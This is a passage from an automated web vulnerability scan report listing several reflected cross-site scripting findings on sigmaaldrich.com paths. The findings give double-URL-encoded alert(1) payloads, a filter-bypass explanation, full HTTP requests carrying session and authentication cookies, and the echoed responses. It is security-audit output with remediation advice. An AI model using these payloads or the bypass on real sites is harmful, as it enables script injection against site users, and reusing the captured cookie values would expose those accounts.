Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:14 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/helpd0d70";alert(1)//b4b75ed686f/help-welcome/ordering-product/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.611. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fed%2522%253balert%25281%2529%252f%252fd0a8380dcdc was submitted in the REST URL parameter 3. This input was echoed as 55fed";alert(1)//d0a8380dcdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome55fed%2522%253balert%25281%2529%252f%252fd0a8380dcdc/ordering-product/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:16 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome55fed";alert(1)//d0a8380dcdc/ordering-product/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.612. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 615f5%2522%253balert%25281%2529%252f%252f4c657ed6f0 was submitted in the REST URL parameter 4. This input was echoed as 615f5";alert(1)//4c657ed6f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product615f5%2522%253balert%25281%2529%252f%252f4c657ed6f0/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:18 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product615f5";alert(1)//4c657ed6f0/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.613. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23722%2522%253balert%25281%2529%252f%252f5c1450bf436 was submitted in the REST URL parameter 5. This input was echoed as 23722";alert(1)//5c1450bf436 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product/23722%2522%253balert%25281%2529%252f%252f5c1450bf436 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:19 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product/23722";alert(1)//5c1450bf436","E404") ;
   </script>
...[SNIP]...

1.614. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.cookies.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137a2%2522%253balert%25281%2529%252f%252fa0e77db71 was submitted in the REST URL parameter 1. This input was echoed as 137a2";alert(1)//a0e77db71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich137a2%2522%253balert%25281%2529%252f%252fa0e77db71/home.cookies.js?change=null&id=1289929994919 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:59 GMT
Connection: close
Set-Cookie: JSESSIONID=074a7fe4-5fa3-574f-8f92-3618e73c9a2e;Path=/
Content-Length: 28931


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich137a2";alert(1)//a0e77db71/home.cookies.js","E404") ;
   </script>
...[SNIP]...

1.615. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.cookies.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d322d%2522%253balert%25281%2529%252f%252fee1888400a was submitted in the REST URL parameter 2. This input was echoed as d322d";alert(1)//ee1888400a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/d322d%2522%253balert%25281%2529%252f%252fee1888400a?change=null&id=1289929994919 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:02 GMT
Connection: close
Set-Cookie: JSESSIONID=16a9b8c1-e049-9640-80ba-e5fe2c8a438f;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/d322d";alert(1)//ee1888400a","E404") ;
   </script>
...[SNIP]...

1.616. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ccd%2522%253balert%25281%2529%252f%252f473b1816d82 was submitted in the REST URL parameter 1. This input was echoed as 59ccd";alert(1)//473b1816d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich59ccd%2522%253balert%25281%2529%252f%252f473b1816d82/home.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=sigma-aldrich&src=IE-SearchBox&FORM=IE8SRC
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=6052cd7d-2bdf-2842-824b-d1623a7fa084;Path=/
Content-Length: 28927


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
